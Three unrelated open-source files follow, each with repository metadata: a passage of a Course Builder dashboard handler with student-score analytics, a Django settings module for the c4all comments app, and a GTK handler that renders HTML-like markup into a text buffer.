return roles.Roles.is_course_admin(self.app_context)
def get(self):
"""Enforces rights to all GET operations."""
if not self.can_view():
self.redirect(self.app_context.get_slug())
return
# Force reload of properties. It is expensive, but admin deserves it!
config.Registry.get_overrides(force_update=True)
return super(DashboardHandler, self).get()
def post(self):
"""Enforces rights to all POST operations."""
if not self.can_edit():
self.redirect(self.app_context.get_slug())
return
return super(DashboardHandler, self).post()
def get_template(self, template_name, dirs):
"""Sets up an environment and Gets jinja template."""
jinja_environment = jinja2.Environment(
autoescape=True, finalize=jinja_filters.finalize,
loader=jinja2.FileSystemLoader(dirs + [os.path.dirname(__file__)]))
jinja_environment.filters['js_string'] = jinja_filters.js_string
return jinja_environment.get_template(template_name)
def _get_alerts(self):
alerts = []
if not courses.is_editable_fs(self.app_context):
alerts.append('Read-only course.')
if not self.app_context.now_available:
alerts.append('The course is not publicly available.')
return '\n'.join(alerts)
def _get_top_nav(self):
current_action = self.request.get('action')
nav_mappings = [
('', 'Outline'),
('assets', 'Assets'),
('settings', 'Settings'),
('analytics', 'Analytics'),
('edit_assignment', 'Peer Review')]
nav = safe_dom.NodeList()
for action, title in nav_mappings:
class_name = 'selected' if action == current_action else ''
action_href = 'dashboard?action=%s' % action
nav.append(safe_dom.Element(
'a', href=action_href, className=class_name).add_text(
title))
if roles.Roles.is_super_admin():
nav.append(safe_dom.Element(
'a', href='/admin').add_text('Admin'))
nav.append(safe_dom.Element(
'a', href='https://code.google.com/p/course-builder/wiki/Dashboard',
target='_blank').add_text('Help'))
return nav
def render_page(self, template_values):
"""Renders a page using provided template values."""
template_values['top_nav'] = self._get_top_nav()
template_values['gcb_course_base'] = self.get_base_href(self)
template_values['user_nav'] = safe_dom.NodeList().append(
safe_dom.Text('%s | ' % users.get_current_user().email())
).append(
safe_dom.Element(
'a', href=users.create_logout_url(self.request.uri)
).add_text('Logout'))
template_values[
'page_footer'] = 'Created on: %s' % datetime.datetime.now()
if not template_values.get('sections'):
template_values['sections'] = []
self.response.write(
self.get_template('view.html', []).render(template_values))
def format_title(self, text):
"""Formats standard title."""
title = self.app_context.get_environ()['course']['title']
return safe_dom.NodeList().append(
safe_dom.Text('Course Builder ')
).append(
safe_dom.Entity('>')
).append(
safe_dom.Text(' %s ' % title)
).append(
safe_dom.Entity('>')
).append(
safe_dom.Text(' Dashboard ')
).append(
safe_dom.Entity('>')
).append(
safe_dom.Text(' %s' % text)
)
def _get_edit_link(self, url):
return safe_dom.NodeList().append(
safe_dom.Text(' ')
).append(
safe_dom.Element('a', href=url).add_text('Edit')
)
def _get_availability(self, resource):
if not hasattr(resource, 'now_available'):
return safe_dom.Text('')
if resource.now_available:
return safe_dom.Text('')
else:
return safe_dom.NodeList().append(
safe_dom.Text(' ')
).append(
safe_dom.Element(
'span', className='draft-label'
).add_text('(%s)' % unit_lesson_editor.DRAFT_TEXT)
)
def render_course_outline_to_html(self):
"""Renders course outline to HTML."""
course = courses.Course(self)
if not course.get_units():
return []
is_editable = filer.is_editable_fs(self.app_context)
lines = safe_dom.Element('ul', style='list-style: none;')
for unit in course.get_units():
if unit.type == 'A':
li = safe_dom.Element('li').add_child(
safe_dom.Element(
'a', href='assessment?name=%s' % unit.unit_id,
className='strong'
).add_text(unit.title)
).add_child(self._get_availability(unit))
if is_editable:
url = self.canonicalize_url(
'/dashboard?%s') % urllib.urlencode({
'action': 'edit_assessment',
'key': unit.unit_id})
li.add_child(self._get_edit_link(url))
lines.add_child(li)
continue
if unit.type == 'O':
li = safe_dom.Element('li').add_child(
safe_dom.Element(
'a', href=unit.href, className='strong'
).add_text(unit.title)
).add_child(self._get_availability(unit))
if is_editable:
url = self.canonicalize_url(
'/dashboard?%s') % urllib.urlencode({
'action': 'edit_link',
'key': unit.unit_id})
li.add_child(self._get_edit_link(url))
lines.add_child(li)
continue
if unit.type == 'U':
li = safe_dom.Element('li').add_child(
safe_dom.Element(
'a', href='unit?unit=%s' % unit.unit_id,
className='strong').add_text(
'Unit %s - %s' % (unit.index, unit.title))
).add_child(self._get_availability(unit))
if is_editable:
url = self.canonicalize_url(
'/dashboard?%s') % urllib.urlencode({
'action': 'edit_unit',
'key': unit.unit_id})
li.add_child(self._get_edit_link(url))
ol = safe_dom.Element('ol')
for lesson in course.get_lessons(unit.unit_id):
li2 = safe_dom.Element('li').add_child(
safe_dom.Element(
'a',
href='unit?unit=%s&lesson=%s' % (
unit.unit_id, lesson.lesson_id),
).add_text(lesson.title)
).add_child(self._get_availability(lesson))
if is_editable:
url = self.get_action_url(
'edit_lesson', key=lesson.lesson_id)
li2.add_child(self._get_edit_link(url))
ol.add_child(li2)
li.add_child(ol)
lines.add_child(li)
continue
raise Exception('Unknown unit type: %s.' % unit.type)
return lines
def get_outline(self):
"""Renders course outline view."""
pages_info = [
safe_dom.Element(
'a', href=self.canonicalize_url('/announcements')
).add_text('Announcements'),
safe_dom.Element(
'a', href=self.canonicalize_url('/course')
).add_text('Course')]
outline_actions = []
if filer.is_editable_fs(self.app_context):
outline_actions.append({
'id': 'edit_unit_lesson',
'caption': 'Organize',
'href': self.get_action_url('edit_unit_lesson')})
outline_actions.append({
'id': 'add_lesson',
'caption': 'Add Lesson',
'action': self.get_action_url('add_lesson'),
'xsrf_token': self.create_xsrf_token('add_lesson')})
outline_actions.append({
'id': 'add_unit',
'caption': 'Add Unit',
'action': self.get_action_url('add_unit'),
'xsrf_token': self.create_xsrf_token('add_unit')})
outline_actions.append({
'id': 'add_link',
'caption': 'Add Link',
'action': self.get_action_url('add_link'),
'xsrf_token': self.create_xsrf_token('add_link')})
outline_actions.append({
'id': 'add_assessment',
'caption': 'Add Assessment',
'action': self.get_action_url('add_assessment'),
'xsrf_token': self.create_xsrf_token('add_assessment')})
if not courses.Course(self).get_units():
outline_actions.append({
'id': 'import_course',
'caption': 'Import',
'href': self.get_action_url('import_course')
})
data_info = self.list_files('/data/')
sections = [
{
'title': 'Pages',
'description': messages.PAGES_DESCRIPTION,
'children': pages_info},
{
'title': 'Course Outline',
'description': messages.COURSE_OUTLINE_DESCRIPTION,
'actions': outline_actions,
'pre': self.render_course_outline_to_html()},
{
'title': 'Data Files',
'description': messages.DATA_FILES_DESCRIPTION,
'children': data_info}]
template_values = {}
template_values['page_title'] = self.format_title('Outline')
template_values['alerts'] = self._get_alerts()
template_values['sections'] = sections
self.render_page(template_values)
def get_action_url(self, action, key=None, extra_args=None):
args = {'action': action}
if key:
args['key'] = key
if extra_args:
args.update(extra_args)
url = '/dashboard?%s' % urllib.urlencode(args)
return self.canonicalize_url(url)
def get_settings(self):
"""Renders course settings view."""
yaml_actions = []
basic_setting_actions = []
# Basic course info.
course_info = [
'Course Title: %s' % self.app_context.get_environ()['course'][
'title'],
'Context Path: %s' % self.app_context.get_slug(),
'Datastore Namespace: %s' % self.app_context.get_namespace_name()]
# Course file system.
fs = self.app_context.fs.impl
course_info.append(('File System: %s' % fs.__class__.__name__))
if fs.__class__ == vfs.LocalReadOnlyFileSystem:
course_info.append(('Home Folder: %s' % sites.abspath(
self.app_context.get_home_folder(), '/')))
# Enable editing if supported.
if filer.is_editable_fs(self.app_context):
yaml_actions.append({
'id': 'edit_course_yaml',
'caption': 'Advanced Edit',
'action': self.get_action_url('create_or_edit_settings'),
'xsrf_token': self.create_xsrf_token(
'create_or_edit_settings')})
yaml_actions.append({
'id': 'edit_basic_course_settings',
'caption': 'Edit',
'action': self.get_action_url('edit_basic_course_settings'),
'xsrf_token': self.create_xsrf_token(
'edit_basic_course_settings')})
# Yaml file content.
yaml_info = []
yaml_stream = self.app_context.fs.open(
self.app_context.get_config_filename())
if yaml_stream:
yaml_lines = yaml_stream.read().decode('utf-8')
for line in yaml_lines.split('\n'):
yaml_info.append(line)
else:
yaml_info.append('< empty file >')
# Prepare template values.
template_values = {}
template_values['page_title'] = self.format_title('Settings')
template_values['page_description'] = messages.SETTINGS_DESCRIPTION
template_values['sections'] = [
{
'title': 'About the Course',
'description': messages.ABOUT_THE_COURSE_DESCRIPTION,
'actions': basic_setting_actions,
'children': course_info},
{
'title': 'Contents of course.yaml file',
'description': messages.CONTENTS_OF_THE_COURSE_DESCRIPTION,
'actions': yaml_actions,
'children': yaml_info}]
self.render_page(template_values)
def list_files(self, subfolder):
"""Makes a list of files in a subfolder."""
home = sites.abspath(self.app_context.get_home_folder(), '/')
files = self.app_context.fs.list(
sites.abspath(self.app_context.get_home_folder(), subfolder))
result = []
for abs_filename in sorted(files):
filename = os.path.relpath(abs_filename, home)
result.append(vfs.AbstractFileSystem.normpath(filename))
return result
def list_and_format_file_list(
self, title, subfolder,
links=False, upload=False, prefix=None, caption_if_empty='< none >',
edit_url_template=None, sub_title=None):
"""Walks files in folders and renders their names in a section."""
items = safe_dom.NodeList()
count = 0
for filename in self.list_files(subfolder):
if prefix and not filename.startswith(prefix):
continue
li = safe_dom.Element('li')
if links:
li.add_child(safe_dom.Element(
'a', href=urllib.quote(filename)).add_text(filename))
if edit_url_template:
edit_url = edit_url_template % urllib.quote(filename)
li.add_child(
safe_dom.Entity(' ')
).add_child(
safe_dom.Element('a', href=edit_url).add_text('[Edit]'))
else:
li.add_text(filename)
count += 1
items.append(li)
output = safe_dom.NodeList()
if filer.is_editable_fs(self.app_context) and upload:
output.append(
safe_dom.Element(
'a', className='gcb-button gcb-pull-right',
href='dashboard?%s' % urllib.urlencode(
{'action': 'add_asset', 'base': subfolder})
).add_text('Upload')
).append(
safe_dom.Element('div', style='clear: both; padding-top: 2px;'))
if title:
h3 = safe_dom.Element('h3')
if count:
h3.add_text('%s (%s)' % (title, count))
else:
h3.add_text(title)
output.append(h3)
if sub_title:
output.append(safe_dom.Element('blockquote').add_text(sub_title))
if items:
output.append(safe_dom.Element('ol').add_children(items))
else:
if caption_if_empty:
output.append(
safe_dom.Element('blockquote').add_text(caption_if_empty))
return output
def get_assets(self):
"""Renders course assets view."""
def inherits_from(folder):
return '< inherited from %s >' % folder
items = safe_dom.NodeList().append(
self.list_and_format_file_list(
'Assessments', '/assets/js/', links=True,
prefix='assets/js/assessment-')
).append(
self.list_and_format_file_list(
'Activities', '/assets/js/', links=True,
prefix='assets/js/activity-')
).append(
self.list_and_format_file_list(
'Images & Documents', '/assets/img/', links=True, upload=True,
edit_url_template='dashboard?action=delete_asset&uri=%s',
sub_title='< inherited from /assets/img/ >',
caption_if_empty=None)
).append(
self.list_and_format_file_list(
'Cascading Style Sheets', '/assets/css/', links=True,
caption_if_empty=inherits_from('/assets/css/'))
).append(
self.list_and_format_file_list(
'JavaScript Libraries', '/assets/lib/', links=True,
caption_if_empty=inherits_from('/assets/lib/'))
).append(
self.list_and_format_file_list(
'View Templates', '/views/',
caption_if_empty=inherits_from('/views/'))
)
template_values = {}
template_values['page_title'] = self.format_title('Assets')
template_values['page_description'] = messages.ASSETS_DESCRIPTION
template_values['main_content'] = items
self.render_page(template_values)
def get_markup_for_basic_analytics(self, job):
"""Renders markup for basic enrollment and assessment analytics."""
subtemplate_values = {}
errors = []
stats_calculated = False
update_message = safe_dom.Text('')
if not job:
update_message = safe_dom.Text(
'Enrollment/assessment statistics have not been calculated '
'yet.')
else:
if job.status_code == jobs.STATUS_CODE_COMPLETED:
stats = transforms.loads(job.output)
stats_calculated = True
subtemplate_values['enrolled'] = stats['enrollment']['enrolled']
subtemplate_values['unenrolled'] = (
stats['enrollment']['unenrolled'])
scores = []
total_records = 0
for key, value in stats['scores'].items():
total_records += value[0]
avg = round(value[1] / value[0], 1) if value[0] else 0
scores.append({'key': key, 'completed': value[0],
'avg': avg})
subtemplate_values['scores'] = scores
subtemplate_values['total_records'] = total_records
# student scores - wopg
s_scores = []
for key, value0 in stats['students'].items():
lin = []
for key1 in ['a1course', 'a2course', 'a3course','a4course','a5course','a6course','a7course','a8course','a9course','a10course','a11course','a12course','postcourse', 'overall_score']:
if key1 in value0.keys():
lin.append(value0[key1])
else:
lin.append(0)
s_scores.append({'key': key, 'scores': lin})
subtemplate_values['students'] = s_scores
# student feedback - wopg
s_feed = []
for key, value in stats['feedback'].items():
s_feed.append({'key': key, 'value': value})
subtemplate_values['feedback'] = s_feed
update_message = safe_dom.Text("""
Enrollment and assessment statistics were last updated at
%s in about %s second(s).""" % (
job.updated_on.strftime(HUMAN_READABLE_TIME_FORMAT),
job.execution_time_sec))
elif job.status_code == jobs.STATUS_CODE_FAILED:
update_message = safe_dom.NodeList().append(
safe_dom.Text("""
There was an error updating enrollment/assessment
statistics. Here is the message:""")
).append(
safe_dom.Element('br')
).append(
safe_dom.Element('blockquote').add_child(
safe_dom.Element('pre').add_text('\n%s' % job.output)))
else:
update_message = safe_dom.Text(
'Enrollment and assessment statistics update started at %s'
' and is running now. Please come back shortly.' %
job.updated_on.strftime(HUMAN_READABLE_TIME_FORMAT))
subtemplate_values['stats_calculated'] = stats_calculated
subtemplate_values['errors'] = errors
subtemplate_values['update_message'] = update_message
return jinja2.utils.Markup(self.get_template(
'basic_analytics.html', [os.path.dirname(__file__)]
).render(subtemplate_values, autoescape=True))
def get_analytics(self):
"""Renders course analytics view."""
template_values = {}
template_values['page_title'] = self.format_title('Analytics')
at_least_one_job_exists = False
at_least_one_job_finished = False
basic_analytics_job = ComputeStudentStats(self.app_context).load()
stats_html = self.get_markup_for_basic_analytics(basic_analytics_job)
if basic_analytics_job:
at_least_one_job_exists = True
if basic_analytics_job.status_code == jobs.STATUS_CODE_COMPLETED:
at_least_one_job_finished = True
for callback in DashboardRegistry.analytics_handlers:
handler = callback()
handler.app_context = self.app_context
handler.request = self.request
handler.response = self.response
job = handler.stats_computer(self.app_context).load()
stats_html += handler.get_markup(job)
if job:
at_least_one_job_exists = True
if job.status_code == jobs.STATUS_CODE_COMPLETED:
at_least_one_job_finished = True
template_values['main_content'] = jinja2.utils.Markup(self.get_template(
'analytics.html', [os.path.dirname(__file__)]
).render({
'show_recalculate_button': (
at_least_one_job_finished or not at_least_one_job_exists),
'stats_html': stats_html,
'xsrf_token': self.create_xsrf_token('compute_student_stats'),
}, autoescape=True))
self.render_page(template_values)
def post_compute_student_stats(self):
"""Submits a new student statistics calculation task."""
job = ComputeStudentStats(self.app_context)
job.submit()
for callback in DashboardRegistry.analytics_handlers:
job = callback().stats_computer(self.app_context)
job.submit()
self.redirect('/dashboard?action=analytics')
class ScoresAggregator(object):
"""Aggregates scores statistics."""
def __init__(self):
# We store all data as tuples keyed by the assessment type name. Each
# tuple keeps:
# (student_count, sum(score))
self.name_to_tuple = {}
def visit(self, student):
if student.scores:
scores = transforms.loads(student.scores)
for key in scores.keys():
if key in self.name_to_tuple:
count = self.name_to_tuple[key][0]
score_sum = self.name_to_tuple[key][1]
else:
count = 0
score_sum = 0
self.name_to_tuple[key] = (
count + 1, score_sum + float(scores[key]))
class StudentAggregator(object):
"""Aggregates student scores for all exercises."""
# We store all scores as tuples keyed by the assessment type name. Each
# tuple keeps:
# (student_email, list of scores)
def __init__(self):
self.name_to_tuple = {}
def visit(self, student):
if student.scores:
scores = transforms.loads(student.scores)
valid = ValidStudent.get_valid(student.key().name())
chave= student.user_id+","+student.name+","+valid.profile
# chave= student.user_id+","+student.name
# for key in scores.keys():
# lista.append(key)
# lista.append(scores[key])
self.name_to_tuple[chave]=scores
class PostcourseAggregator(object):
def __init__(self):
self.name_to_tuple = {}
def visit(self, student):
mn = MODULE_QUESTIONS
feedb = transforms.loads(student.data)
for key in feedb.keys():
lista = []
lista =feedb[key]
li = []
lim ={'a1course':mn[0],'a2course':mn[1],'a3course':mn[2],'a4course':mn[3],'a5course':mn[4],'a6course':mn[5]}
lim['a7course']=mn[6]
lim['a8course']=mn[7]
lim['a9course']=mn[8]
lim['a10course']=mn[9]
lim['a11course']=mn[10]
lim['a12course']=mn[11]
lim['postcourse']=mn[12]
for i in range(0,lim[key]):
if key <> 'postcourse':
li.append(lista[i]['correct'])
else:
li.append(lista[i]['value'])
chave = student.key().name()+ ',' + key
self.name_to_tuple[chave]= li
# logging.error('chave : %s dados : %s ', chave, li)
class EnrollmentAggregator(object):
"""Aggregates enrollment statistics."""
def __init__(self):
self.enrolled = 0
self.unenrolled = 0
def visit(self, student):
if student.is_enrolled:
self.enrolled += 1
else:
self.unenrolled += 1
class ComputeStudentStats(jobs.DurableJob):
"""A job that computes student statistics."""
def run(self):
"""Computes student statistics."""
enrollment = EnrollmentAggregator()
scores = ScoresAggregator()
student_scores = StudentAggregator()
feedback = PostcourseAggregator()
mapper = utils.QueryMapper(
Student.all(), batch_size=500, report_every=1000)
def map_fn(student):
enrollment.visit(student)
scores.visit(student)
student_scores.visit(student)
mapper.run(map_fn)
mapper = utils.QueryMapper(
StudentAnswersEntity.all(), batch_size=500, report_every=1000)
def map_fn1(student):
feedback.visit(student)
mapper.run(map_fn1)
data = {
'enrollment': {
'enrolled': enrollment.enrolled,
'unenrolled': enrollment.unenrolled},
'scores': scores.name_to_tuple,
'students' : student_scores.name_to_tuple,
'feedback' : feedback.name_to_tuple}
return data
class DashboardRegistry(object):
"""Holds registered handlers that produce HTML code for the dashboard."""
analytics_handlers = []
@classmethod
def add_custom_analytics_section(cls, handler):
"""Adds handlers that provide additional data for the Analytics page."""
if handler not in cls.analytics_handlers:
existing_names = [h.name for h in cls.analytics_handlers]
existing_names.append('enrollment')
existing_names.append('scores')
existing_names.append('students')
existing_names.append('feedback')
if handler.name in existing_names:
raise Exception('Stats handler name %s is being duplicated.'
% handler.name)
cls.analytics_handlers.append(handler)
custom_module = None
def register_module():
"""Registers this module in the registry."""
dashboard_handlers = [('/dashboard', DashboardHandler)]
global custom_module
custom_module = custom_modules.Module(
'Course Dashboard',
'A set of pages for managing Course Builder course.',
[], dashboard_handlers)
return custom_module
| {
"content_hash": "4fc2129a73593af2fb6a1967a626e922",
"timestamp": "",
"source": "github",
"line_count": 821,
"max_line_length": 187,
"avg_line_length": 38.66991473812424,
"alnum_prop": 0.5514678089958422,
"repo_name": "ksh/gpitrainingv2",
"id": "ca6f23d34fa59ff3832eff1152cb8b7d4a5bda2a",
"size": "32346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modules/dashboard/dashboard.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "396865"
},
{
"name": "Python",
"bytes": "952535"
}
],
"symlink_target": ""
} |
import os.path
ROOT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
PROJECT_NAME = os.path.basename(ROOT_DIR)
def ABS_PATH(*args):
return os.path.join(ROOT_DIR, *args)
def ENV_SETTING(key, default):
import os
return os.environ.get(key, default)
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
LANGUAGES = (
('en', 'English'),
('sv_SE', 'Swedish')
)
LOCALE_PATHS = (ABS_PATH('../locale'), )
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Europe/Stockholm'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'sv_SE'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# If you set this to False, Django will treat all time values as local to
# the specified timezone.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ABS_PATH('media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ABS_PATH('static')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
ABS_PATH('staticfiles'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
def ensure_secret_key_file():
"""Checks that secret.py exists in settings dir. If not, creates one
with a random generated SECRET_KEY setting."""
secret_path = os.path.join(ABS_PATH('settings'), 'secret.py')
if not os.path.exists(secret_path):
from django.utils.crypto import get_random_string
secret_key = get_random_string(
50,
'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
)
with open(secret_path, 'w') as f:
f.write("SECRET_KEY = " + repr(secret_key) + "\n")
# Import the secret key
ensure_secret_key_file()
from secret import SECRET_KEY # noqa
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
ABS_PATH('templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.debug",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages",
'django.template.context_processors.request',
"comments.context_processors.base_url"
],
'debug': (ENV_SETTING('TEMPLATE_DEBUG', 'true') == 'true'),
},
},
]
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = PROJECT_NAME + '.urls'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
#'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'c4all.apps.C4allCommentsConfig',
'c4all.apps.C4allAdminConfig',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'DEBUG',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
AUTH_USER_MODEL = "c4all_comments.CustomUser"
LOGIN_URL = "/admin/"
BASE_URL = ""
BASE_STATIC = BASE_URL + STATIC_URL
AVATAR_NUM_MIN = 1
AVATAR_NUM_MAX = 28
# regex for getting domain from url, includes port number
DOMAIN_URL_PATTERN = "(https?:\/\/)?([a-z0-9_.-]+\.[a-z0-9]{2,5}(:\d+)?)"
# pagination settings
PER_PAGE = 20
TITLE_SELECTOR = '#c4all-admin-page-title'
# spellchecking ability (disabled by default)
SPELLCHECK_ENABLED = False
# default number of comments
WIDGET_COMMENTS_DEFAULT_NUMBER = 10
| {
"content_hash": "039813fab6b4ec00e2a0b6bb4beb11a8",
"timestamp": "",
"source": "github",
"line_count": 218,
"max_line_length": 79,
"avg_line_length": 30.720183486238533,
"alnum_prop": 0.657010601761983,
"repo_name": "c4all/c4all",
"id": "1f79ca259dd00bcac84f8ea0728c823393cc14ba",
"size": "6716",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "c4all/settings/base.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "122567"
},
{
"name": "HTML",
"bytes": "66965"
},
{
"name": "JavaScript",
"bytes": "108371"
},
{
"name": "Makefile",
"bytes": "1738"
},
{
"name": "Python",
"bytes": "208817"
}
],
"symlink_target": ""
} |
"""
Copyright (c) 2008 Marian Tietz
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE AUTHORS AND CONTRIBUTORS ``AS IS'' AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
"""
import gtk
import pango
import logging
import xml.sax
import xml.sax.handler
from StringIO import StringIO
from .. import gui
from ..helper.url import URLToTag
from .. import helper
from .. import config
class HTMLHandler(xml.sax.handler.ContentHandler):
"""
Parses HTML like strings and applies
the tags as format rules for the given text buffer.
"""
def __init__(self, textbuffer, handler):
xml.sax.handler.ContentHandler.__init__(self)
self.textbuffer = textbuffer
self.ignoreableEndTags = ["msg","br","su","sb"]
self.no_cache = ["a","sb","su"]
self.URLHandler = handler
self._reset_values()
def _reset_values(self):
self.elms = []
self.tags = []
self.sucount = 0
self.sbcount = 0
def _get_cache_name(self, name, attrs):
" return the caching name of a element for tag caching "
def attrs_to_dict(attrs):
return "{"+ ",".join(
[n+":"+attrs.getValue(n) for n in attrs.getNames()]) +"}"
if name in ("font","span"):
return name + attrs_to_dict(attrs)
return name
def _get_cached(self, cachename):
" return the cached tag for the given element or None "
return self.textbuffer.get_tag_table().lookup(cachename)
def _apply_tag(self, name, tag):
""" mark the element and the tag to be added later.
This is usually called in startElement.
"""
self.elms.insert(0, name)
self.tags.insert(0, tag)
def characters(self, text):
""" Raw characters? Apply them (with tags, if given)
to the text buffer
"""
if len(self.tags):
# there are tags, apply them to the text
self.textbuffer.insert_with_tags(
self.textbuffer.get_end_iter(),
text,
*self.tags)
else:
# no tags, just add the text
self.textbuffer.insert(
self.textbuffer.get_end_iter(),
text)
def startDocument(self):
pass
def startElement(self, name, attrs):
if not name in self.no_cache:
cname = self._get_cache_name(name,attrs)
tag = self.textbuffer.get_tag_table().lookup(cname)
if tag: # found a already known tag, use it
self._apply_tag(name, tag)
return
# handle no tag creating elements
if name == "br":
self.textbuffer.insert(self.textbuffer.get_end_iter(),"\n")
return
# create a new tag
if name in self.no_cache:
tag = self.textbuffer.create_tag(None)
else:
tag = self.textbuffer.create_tag(
self._get_cache_name(name, attrs))
tag.s_attribute = {} # special attribute for identifying
tag.s_attribute[name] = True
if name == "b":
tag.set_property("weight", pango.WEIGHT_BOLD)
elif name == "i":
tag.set_property("style", pango.STYLE_ITALIC)
elif name == "u":
tag.set_property("underline", pango.UNDERLINE_SINGLE)
elif name == "a":
if self.URLHandler:
tag.set_property("underline", pango.UNDERLINE_SINGLE)
tag.connect("event", self.URLHandler, attrs["href"])
tag.s_attribute["a.href"] = attrs["href"]
elif name == "su":
self.sucount += 1
if self.sucount % 2 != 0:
tag.set_property("underline", pango.UNDERLINE_SINGLE)
else:
tag.set_property("underline", pango.UNDERLINE_NONE)
elif name == "sb":
self.sbcount += 1
if self.sbcount % 2 != 0:
tag.set_property("weight", pango.WEIGHT_BOLD)
else:
tag.set_property("weight", pango.WEIGHT_NORMAL)
elif name in ("font","span"):
self._parseFont(tag, attrs)
elif name == "msg":
# start tag to avoid errors due to
# missing overall-tag
#
self._parseFont(tag, attrs)
self._apply_tag(name, tag)
def endElement(self, name):
if name in self.ignoreableEndTags:
return
try:
i = self.elms.index(name)
except ValueError:
pass
else:
del self.elms[i]
del self.tags[i]
def endDocument(self):
""" Close all special bold/underline tags. """
if self.sbcount % 2 != 0 or self.sucount % 2 != 0:
tag = self.textbuffer.create_tag(None)
if self.sbcount % 2 != 0:
tag.set_property("weight", pango.WEIGHT_NORMAL)
if self.sucount % 2 != 0:
tag.set_property("underline", pango.UNDERLINE_NONE)
self.textbuffer.insert_with_tags(
self.textbuffer.get_end_iter(),
"",
tag)
self._reset_values()
""" PARSING HELPER """
def _parseFont(self, tag, attrs):
if not attrs or attrs.getLength() == 0:
return
for name in attrs.getNames():
if name == "weight":
if attrs[name] == "bold":
tag.set_property("weight", pango.WEIGHT_BOLD)
elif attrs[name] == "normal":
tag.set_property("weight", pango.WEIGHT_NORMAL)
elif name == "style":
if attrs[name] == "italic":
tag.set_property("style", pango.STYLE_ITALIC)
elif attrs[name] == "normal":
tag.set_property("style", pango.STYLE_NORMAL)
else:
try:
tag.set_property(name, attrs[name])
except Exception as ex:
logging.error("_parseFont: %s" % (ex))
